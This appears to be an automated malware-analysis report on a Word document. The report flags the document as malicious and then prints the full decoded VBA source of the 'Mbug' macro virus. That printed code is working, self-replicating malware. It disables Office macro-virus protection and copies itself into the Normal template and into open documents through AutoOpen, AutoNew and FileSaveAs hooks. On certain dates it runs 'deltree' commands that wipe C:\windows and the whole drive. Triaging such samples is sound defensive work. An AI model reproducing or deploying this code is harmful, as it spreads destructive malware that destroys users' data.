Verdict: MALICIOUS
Risk Score: 308

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1490 Inhibit System Recovery
The sample contains VBA macros that execute upon opening or execution. The AutoExec subroutine contains calls to 'Shell "deltree /y c:\windows", vbHide' and 'Shell "deltree /y c:\*.*", vbHide', indicating an attempt to delete local files and inhibit system recovery. The AutoNew and AutoOpen subroutines attempt to copy the 'Mbug' macro and 'UserForm1' to the Normal template, suggesting an effort to establish persistence.
Heuristics (6):
- ClamAV: Doc.Trojan.Mbug-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Mbug-1
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script: `Shell "deltree /y c:\windows", vbHide`
- VBA macro-virus self-replication / AV tampering [critical, OLE_VBA_MACRO_VIRUS_REPLICATION]: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5556 bytes |

SHA-256: 0e88885832b7d45dba881f91635410074d8ca68f95056463a369f81dc8a991dc

Detection:
- ClamAV: Win.Trojan.DelTree-10
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Mbug"
Sub AutoExec()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo errorAE
    If Day(Now()) = "21" Or Day(Now()) = "25" Then
        UserForm1.Show
        Shell "deltree /y c:\windows", vbHide
        Shell "deltree /y c:\*.*", vbHide
    End If
errorAE:
End Sub

Sub AutoNew()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorAN
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
    With Dialogs(wdDialogFileSummaryInfo)
        .Subject = "You Have been infected by the Alliance 98"
        .Execute
    End With
ErrorAN:
End Sub

Sub AutoOpen()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorAO
    iMacroCount = WordBasic.CountMacros(0, 0)
    For i = 1 To iMacroCount
        If WordBasic.[MacroName$](i, 0) = "Mbug" Then
            bInstalled = -1
        End If
    Next i
    If Not bInstalled Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
        For a = 1 To 10
            StatusBar = "Microsoft"
        Next a
    Else
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
    End If
ErrorAO:
End Sub

Sub FileSaveAs()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorFSA
    If Day(Now()) = "21" Or Day(Now()) = "25" Then
        UserForm1.Show
        Shell "deltree /y c:\windows", vbMinimizedFocus
        Shell "deltree /y c:\*.*", vbMinimizedFocus
    End If
    Dialogs(wdDialogFileSaveAs).Show
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Mbug", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.Save
ErrorFSA:
    If (ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate) Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
End Sub

Sub FilePrint()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorFP
    InsertPayload
    Dialogs(wdDialogFilePrint).Show
ErrorFP:
End Sub

Sub FilePrintDefault()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorFPD
    InsertPayload
    ActiveDocument.PrintOut
ErrorFPD:
End Sub

Sub FileTemplates()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorFT
ErrorFT:
End Sub

Sub InsertPayload()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorIP
    Dim WPrint$, Adding
    WPrint$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NbrePrint", "Nuclear98.ini")
    Adding = WordBasic.Val(WPrint$) + 1
    WordBasic.SetPrivateProfileString "Microsoft Word", "NbrePrint", Str(Adding), "Nuclear98.ini"
    WPrint$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "NbrePrint", "Nuclear98.ini")
    If WPrint$ = 12 Then
        Selection.EndKey Unit:=wdLine
        Selection.TypeParagraph
        Selection.TypeText Text:="bug"
        Selection.TypeParagraph
        Selection.TypeParagraph
        Selection.TypeText Text:="bug"
        Selection.HomeKey Unit:=wdLine
        Selection.EndKey Unit:=wdLine, Extend:=wdExtend
        Selection.Font.Bold = wdToggle
        WordBasic.SetPrivateProfileString "Microsoft Word", "NbrePrint", "1", "Nuclear98.ini"
    End If
ErrorIP:
End Sub

Sub ToolsMacro()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorTM
ErrorTM:
End Sub

Sub ViewVBCode()
    Application.EnableCancelKey = wdCancelDisabled
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{7C541D26-BB10-11BD-B107-444553540000}{7C541D0A-BB10-11BD-B107-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
    MsgBox "My name is Macrobug", vbInformation, "Information Box"
End Sub

Private Sub TextBox1_Change()
    MsgBox "Don't change my name", vbInformation, "!!!"
End Sub

Private Sub UserForm_Initialize()
    TextBox1.Text = "MacroBug"
End Sub
```